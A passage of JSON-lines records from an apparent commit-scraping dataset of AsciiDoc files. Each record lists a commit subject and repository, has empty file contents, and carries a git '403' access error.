icky\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,StefanGor\/elasticsearch","old_file":"docs\/reference\/docs\/multi-termvectors.asciidoc","new_file":"docs\/reference\/docs\/multi-termvectors.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a7ef10430eaff795df864dfa76a7e018e93315","subject":"Update 
2016-02-26-Gantt.adoc","message":"Update 2016-02-26-Gantt.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt.adoc","new_file":"_posts\/2016-02-26-Gantt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26d6c1dd546fa957c821a7069ea33e528a636708","subject":"y2b create post Samsung Galaxy S8 - Does It Suck?","message":"y2b create post Samsung Galaxy S8 - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-03-Samsung-Galaxy-S8--Does-It-Suck.adoc","new_file":"_posts\/2017-04-03-Samsung-Galaxy-S8--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adca53a984d6ed0af389396a6062d4de2ff13ed2","subject":"Start of API landing page.","message":"Start of API landing page.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/libnng.adoc","new_file":"docs\/libnng.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"297fdfbc5107549f1b3df26ba8e0d5b02403fcc7","subject":"Update 2015-07-13-Essential-Drupal-development-tools.adoc","message":"Update 2015-07-13-Essential-Drupal-development-tools.adoc","repos":"trangunghoa\/hubpress.io,trangunghoa\/hubpress.io,trangunghoa\/hubpress.io","old_file":"_posts\/2015-07-13-Essential-Drupal-development-tools.adoc","new_file":"_posts\/2015-07-13-Essential-Drupal-development-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trangunghoa\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0aa64001774beb4a4c006c1ae0d9b843d4e0053","subject":"Update 2016-01-12-This-is.adoc","message":"Update 2016-01-12-This-is.adoc","repos":"kim0\/hubpress.io,kim0\/hubpress.io,kim0\/hubpress.io","old_file":"_posts\/2016-01-12-This-is.adoc","new_file":"_posts\/2016-01-12-This-is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kim0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2d1dd355cd9061958276bc30ec5be16e2c03271","subject":"Update 2016-03-10-T-E-S-T.adoc","message":"Update 2016-03-10-T-E-S-T.adoc","repos":"innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io","old_file":"_posts\/2016-03-10-T-E-S-T.adoc","new_file":"_posts\/2016-03-10-T-E-S-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-yagasaki\/innovation-yagasaki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e3881b7d282aedb948fa28418fb2988ba5c2f22","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 
2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526c062efb4ebbabb0e81cfb999337d9b0d38cb7","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79195fa0f0641cae87812b716b81d6cbb77a5953","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b89a5f5bdc1a973954b936f5d102ffddd9c542f","subject":"Update 2017-06-12-neural_networks_training_basics.adoc","message":"Update 2017-06-12-neural_networks_training_basics.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ff22d2a5b31923d8f2f6e23b9b91885e26cfeb2","subject":"Update 2015-11-27-New-Maven-project-for-FoundationFaces.adoc","message":"Update 2015-11-27-New-Maven-project-for-FoundationFaces.adoc","repos":"hfluz\/hfluz.github.io,hfluz\/hfluz.github.io,hfluz\/hfluz.github.io","old_file":"_posts\/2015-11-27-New-Maven-project-for-FoundationFaces.adoc","new_file":"_posts\/2015-11-27-New-Maven-project-for-FoundationFaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hfluz\/hfluz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c447b9d068cd0869b581dd53072d96978d073fb8","subject":"Update 2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","message":"Update 2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","repos":"mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog","old_file":"_posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","new_file":"_posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrtrombley\/blog.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4de43f7f2808ff42aec33dbfa6433b7be1c458bb","subject":"Update 2016-07-18-Using-ember-cli-visual-acceptance.adoc","message":"Update 2016-07-18-Using-ember-cli-visual-acceptance.adoc","repos":"ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog","old_file":"_posts\/2016-07-18-Using-ember-cli-visual-acceptance.adoc","new_file":"_posts\/2016-07-18-Using-ember-cli-visual-acceptance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciena-blueplanet\/developers.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"369b2cf303420e12e81e9211e58032bdf386c573","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4de32052042d70a67920ffb077b216e3d7afaa7","subject":"Update 2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","message":"Update 2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_file":"_posts\/2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86afd446c36b7baf210924dc6927ea8c14866350","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"various\/fuse-demo\/readme.adoc","new_file":"various\/fuse-demo\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76787732aa23652aea02d90ef54a8044ddc835d9","subject":"[DOCS] Added release highlights for 6.3 (#31256)","message":"[DOCS] Added release highlights for 6.3 (#31256)\n\n* [DOCS] Added release highlights for 6.3\n\n* [DOCS] Fixed typos and link to rollup section.\n\n* [DOCS] Fixed 
typo\n","repos":"strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra","old_file":"docs\/reference\/release-notes\/highlights-6.3.0.asciidoc","new_file":"docs\/reference\/release-notes\/highlights-6.3.0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d31a48a2f92f0cf10d2996a58a42817c0a3f4b11","subject":"Add Google Cloud Paid services snippet","message":"Add Google Cloud Paid services snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-note-googlecloudpaidservices.adoc","new_file":"src\/main\/docs\/common-note-googlecloudpaidservices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cbb84edb1ba9f6ddffa40a60e884ff4b596e1b2c","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e15e033b7d503e6e58eac5b605f1cf0e0e24818","subject":"Update 2017-02-01-Building-the-web-with-position-sticky.adoc","message":"Update 2017-02-01-Building-the-web-with-position-sticky.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-02-01-Building-the-web-with-position-sticky.adoc","new_file":"_posts\/2017-02-01-Building-the-web-with-position-sticky.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fe4866563f33f5be43d2e55149490309d14d9a6","subject":"Update 2015-08-17-Prometheus-Introduction.adoc","message":"Update 2015-08-17-Prometheus-Introduction.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-08-17-Prometheus-Introduction.adoc","new_file":"_posts\/2015-08-17-Prometheus-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"985561c75b8ea1c02b5d6babdf33eceb44c15c63","subject":"y2b create post Asus Padfone X Unboxing \\u0026 Tour","message":"y2b create post Asus Padfone X Unboxing \\u0026 
Tour","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-17-Asus-Padfone-X-Unboxing-u0026-Tour.adoc","new_file":"_posts\/2014-06-17-Asus-Padfone-X-Unboxing-u0026-Tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f5335716d186e6968ec5b22e347c77645589ca9","subject":"y2b create post What If You Could FEEL Video Games?","message":"y2b create post What If You Could FEEL Video Games?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-18-What-If-You-Could-FEEL-Video-Games.adoc","new_file":"_posts\/2016-11-18-What-If-You-Could-FEEL-Video-Games.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb83491f2a84acab2a4d9958e157018a246c9b87","subject":"add tenants section and update metrics section","message":"add tenants section and update metrics section\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35449aed260f12ebae77a97d987822cf2c46342e","subject":"Update 2015-03-04-zsh-auto_cd-gulp-global-command-conflict-fix.adoc","message":"Update 2015-03-04-zsh-auto_cd-gulp-global-command-conflict-fix.adoc","repos":"therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks","old_file":"_posts\/2015-03-04-zsh-auto_cd-gulp-global-command-conflict-fix.adoc","new_file":"_posts\/2015-03-04-zsh-auto_cd-gulp-global-command-conflict-fix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/therebelrobot\/blog-n.ode.rocks.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2373d09dfcec4c397d29eba241ce07ce79574549","subject":"Update 2016-03-10-Star-Wars-Day-at-Sea-returning-in-early-2017.adoc","message":"Update 2016-03-10-Star-Wars-Day-at-Sea-returning-in-early-2017.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-10-Star-Wars-Day-at-Sea-returning-in-early-2017.adoc","new_file":"_posts\/2016-03-10-Star-Wars-Day-at-Sea-returning-in-early-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2e6ecf81ed60aa71bd5a3aed2e8b05d87906f91","subject":"Update 2015-07-08-Test.adoc","message":"Update 
2015-07-08-Test.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"_posts\/2015-07-08-Test.adoc","new_file":"_posts\/2015-07-08-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8ab9c4d71e79dc11d5a75afa08c27b06fe7389d","subject":"Update 2017-02-22-test.adoc","message":"Update 2017-02-22-test.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-02-22-test.adoc","new_file":"_posts\/2017-02-22-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4008ebfad3221c5ecbd84bf054e016b3dfdbd356","subject":"Update 2018-12-14-TEST.adoc","message":"Update 2018-12-14-TEST.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2018-12-14-TEST.adoc","new_file":"_posts\/2018-12-14-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffebc0f3c930ca985e9ae5bbfe917d91e6fbbb61","subject":"Update 2016-08-21-Setting-up-Vertx-HTT-P-with-JKS.adoc","message":"Update 2016-08-21-Setting-up-Vertx-HTT-P-with-JKS.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-08-21-Setting-up-Vertx-HTT-P-with-JKS.adoc","new_file":"_posts\/2016-08-21-Setting-up-Vertx-HTT-P-with-JKS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c7e5d2b88db8f579438e2db1a8cf4d137581b40","subject":"y2b create post This Gadget Squeezes Your Skull","message":"y2b create post This Gadget Squeezes Your Skull","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-26-This-Gadget-Squeezes-Your-Skull.adoc","new_file":"_posts\/2016-08-26-This-Gadget-Squeezes-Your-Skull.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de879821b57be24d5b07830fa6406adf7227a0a3","subject":"y2b create post iPhone 5 or Samsung Galaxy S3 GIVEAWAY!","message":"y2b create post iPhone 5 or Samsung Galaxy S3 GIVEAWAY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-12-iPhone-5-or-Samsung-Galaxy-S3-GIVEAWAY.adoc","new_file":"_posts\/2012-12-12-iPhone-5-or-Samsung-Galaxy-S3-GIVEAWAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"029c289be6583cee3b4be15a8afe6ac25c9f72d1","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f601ef6c9e5210827ebe5309629d1b55e48167f4","subject":"y2b create post The Best Headphones That Money Can Buy...","message":"y2b create post The Best Headphones That Money Can Buy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-13-The-Best-Headphones-That-Money-Can-Buy.adoc","new_file":"_posts\/2018-01-13-The-Best-Headphones-That-Money-Can-Buy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba26565ae38bc23e2b73af8c5762e9d9b9b700cf","subject":"Update 2016-06-11-Folding-the-Universe-part-I-I.adoc","message":"Update 2016-06-11-Folding-the-Universe-part-I-I.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-11-Folding-the-Universe-part-I-I.adoc","new_file":"_posts\/2016-06-11-Folding-the-Universe-part-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d4e9e3236f22419eb0dcbe6bb36d8331554c20e","subject":"Renamed '_posts\/2019-04-15-Ansible-collection-processing.adoc' to '_posts\/2019-04-25-Ansible-collection-processing.adoc'","message":"Renamed '_posts\/2019-04-15-Ansible-collection-processing.adoc' to '_posts\/2019-04-25-Ansible-collection-processing.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-04-25-Ansible-collection-processing.adoc","new_file":"_posts\/2019-04-25-Ansible-collection-processing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01ef80a33dd91ae9140f919088a0c731a971c3dc","subject":"Update range-filter.asciidoc","message":"Update range-filter.asciidoc\n\nCloses 
#8741\n","repos":"mmaracic\/elasticsearch,codebunt\/elasticsearch,Shekharrajak\/elasticsearch,lmtwga\/elasticsearch,slavau\/elasticsearch,dylan8902\/elasticsearch,caengcjd\/elasticsearch,knight1128\/elasticsearch,weipinghe\/elasticsearch,andrejserafim\/elasticsearch,slavau\/elasticsearch,ouyangkongtong\/elasticsearch,himanshuag\/elasticsearch,smflorentino\/elasticsearch,vvcephei\/elasticsearch,mgalushka\/elasticsearch,scottsom\/elasticsearch,jbertouch\/elasticsearch,HonzaKral\/elasticsearch,Shekharrajak\/elasticsearch,koxa29\/elasticsearch,mbrukman\/elasticsearch,HarishAtGitHub\/elasticsearch,pranavraman\/elasticsearch,masaruh\/elasticsearch,infusionsoft\/elasticsearch,zeroctu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,knight1128\/elasticsearch,a2lin\/elasticsearch,dylan8902\/elasticsearch,wenpos\/elasticsearch,AndreKR\/elasticsearch,Widen\/elasticsearch,huypx1292\/elasticsearch,lchennup\/elasticsearch,Fsero\/elasticsearch,jimhooker2002\/elasticsearch,skearns64\/elasticsearch,tsohil\/elasticsearch,dpursehouse\/elasticsearch,kkirsche\/elasticsearch,huanzhong\/elasticsearch,MaineC\/elasticsearch,infusionsoft\/elasticsearch,Clairebi\/ElasticsearchClone,wimvds\/elasticsearch,masterweb121\/elasticsearch,alexshadow007\/elasticsearch,bestwpw\/elasticsearch,Stacey-Gammon\/elasticsearch,sjohnr\/elasticsearch,wayeast\/elasticsearch,NBSW\/elasticsearch,xuzha\/elasticsearch,lzo\/elasticsearch-1,sposam\/elasticsearch,petmit\/elasticsearch,Shepard1212\/elasticsearch,franklanganke\/elasticsearch,nknize\/elasticsearch,ulkas\/elasticsearch,episerver\/elasticsearch,slavau\/elasticsearch,palecur\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,drewr\/elasticsearch,socialrank\/elasticsearch,EasonYi\/elasticsearch,kaneshin\/elasticsearch,onegambler\/elasticsearch,petabytedata\/elasticsearch,heng4fun\/elasticsearch,kubum\/elasticsearch,hechunwen\/elasticsearch,wimvds\/elasticsearch,davidvgalbraith\/elasticsearch,apepper\/elasticsearch,Fsero\/elasticsearch,Rygbee\/elasticsearch,adrianbk\/elasticsearch,huanzhong\/elasticsearch,yynil\/elasticsearch,lmtwga\/elasticsearch,javachengwc\/elasticsearch,nellicus\/elasticsearch,tkssharma\/elasticsearch,diendt\/elasticsearch,scorpionvicky\/elasticsearch,queirozfcom\/elasticsearch,Fsero\/elasticsearch,mkis-\/elasticsearch,LewayneNaidoo\/elasticsearch,karthikjaps\/elasticsearch,hirdesh2008\/elasticsearch,StefanGor\/elasticsearch,TonyChai24\/ESSource,chirilo\/elasticsearch,djschny\/elasticsearch,pablocastro\/elasticsearch,pozhidaevak\/elasticsearch,MichaelLiZhou\/elasticsearch,mgalushka\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,wangyuxue\/elasticsearch,andrestc\/elasticsearch,MjAbuz\/elasticsearch,nezirus\/elasticsearch,easonC\/elasticsearch,SergVro\/elasticsearch,socialrank\/elasticsearch,artnowo\/elasticsearch,dataduke\/elasticsearch,glefloch\/elasticsearch,karthikjaps\/elasticsearch,nezirus\/elasticsearch,sdauletau\/elasticsearch,kalimatas\/elasticsearch,markharwood\/elasticsearch,rento19962\/elasticsearch,kalburgimanjunath\/elasticsearch,heng4fun\/elasticsearch,kaneshin\/elasticsearch,abibell\/elasticsearch,jprante\/elasticsearch,linglaiyao1314\/elasticsearch,jbertouch\/elasticsearch,jsgao0\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,kenshin233\/elasticsearch,jpountz\/elasticsearch,JackyMai\/elasticsearch,martinstuga\/elasticsearch,huanzhong\/elasticsearch,markllama\/elasticsearch,liweinan0423\/elasticsearch,Stacey-Gammon\/elasticsearch,sposam\/elasticsearch,feiqitian\/elasticsearch,lzo\/elasticsearch-
1,xuzha\/elasticsearch,Collaborne\/elasticsearch,liweinan0423\/elasticsearch,jw0201\/elastic,jw0201\/elastic,18098924759\/elasticsearch,vietlq\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,ouyangkongtong\/elasticsearch,rlugojr\/elasticsearch,amaliujia\/elasticsearch,adrianbk\/elasticsearch,lmtwga\/elasticsearch,jango2015\/elasticsearch,skearns64\/elasticsearch,luiseduardohdbackup\/elasticsearch,khiraiwa\/elasticsearch,diendt\/elasticsearch,snikch\/elasticsearch,JSCooke\/elasticsearch,strapdata\/elassandra,tahaemin\/elasticsearch,nilabhsagar\/elasticsearch,adrianbk\/elasticsearch,jeteve\/elasticsearch,winstonewert\/elasticsearch,mm0\/elasticsearch,fernandozhu\/elasticsearch,Flipkart\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,xpandan\/elasticsearch,Liziyao\/elasticsearch,jsgao0\/elasticsearch,Ansh90\/elasticsearch,Uiho\/elasticsearch,sposam\/elasticsearch,wittyameta\/elasticsearch,martinstuga\/elasticsearch,fekaputra\/elasticsearch,Rygbee\/elasticsearch,wangtuo\/elasticsearch,lchennup\/elasticsearch,Uiho\/elasticsearch,chrismwendt\/elasticsearch,IanvsPoplicola\/elasticsearch,ydsakyclguozi\/elasticsearch,vvcephei\/elasticsearch,davidvgalbraith\/elasticsearch,schonf